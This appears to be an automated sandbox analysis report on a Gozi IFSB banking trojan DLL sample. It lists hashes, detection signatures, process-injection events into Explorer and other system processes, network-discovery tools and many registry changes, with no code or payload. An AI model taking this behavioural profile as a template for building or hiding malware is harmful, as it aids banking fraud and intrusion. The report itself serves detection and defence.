Malware Analysis Report

2024-10-19 01:08

Sample ID 220809-pnx1tsaccl
Target f9d778ad3bfea174401f36a2d88851d8
SHA256 44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5

Threat Level: Known bad

The file f9d778ad3bfea174401f36a2d88851d8 was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Suspicious behavior: MapViewOfSection

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Discovers systems in the same network

Suspicious use of WriteProcessMemory

Gathers system information

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-09 12:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-09 12:29

Reported

2022-08-09 12:31

Platform

win7-20220715-en

Max time kernel

48s

Max time network

45s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

Network

N/A

Files

memory/1932-54-0x000007FEFC381000-0x000007FEFC383000-memory.dmp

memory/1832-55-0x0000000000000000-mapping.dmp

memory/1832-56-0x0000000076281000-0x0000000076283000-memory.dmp

memory/1832-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1832-63-0x0000000000260000-0x000000000026D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-09 12:29

Reported

2022-08-09 12:31

Platform

win10v2004-20220722-en

Max time kernel

151s

Max time network

154s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1520 set thread context of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1716 set thread context of 4028 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\control.exe
PID 1028 set thread context of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 set thread context of 3784 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 set thread context of 4816 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 set thread context of 3256 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 4244 N/A C:\Windows\system32\control.exe C:\Windows\system32\rundll32.exe
PID 1028 set thread context of 3240 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c405d5b7-d2cb-4889-97 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = ca73dba6fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = [binary value elided] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\167bd767-e11a-4694-9b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = 12003ba5fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = b8354ba5fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = 8c8355a7fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = [binary value elided] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0065f893-8090-49d4-8d C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = [binary value elided] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ffece5954ed7a6bf283d28ce3cccf569e240c3907c13f708593aa3c6bc89ccab" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = 5c1352a5fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = bf2224a5fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9c89f2bd41aee2ec830a66132c5645606c291cf54f900f2c9b92cc3650442eca" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = [binary value elided] C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d7eecab9-6c40-413e-95 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a9cea0c2-7e1f-4d89-a5 C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
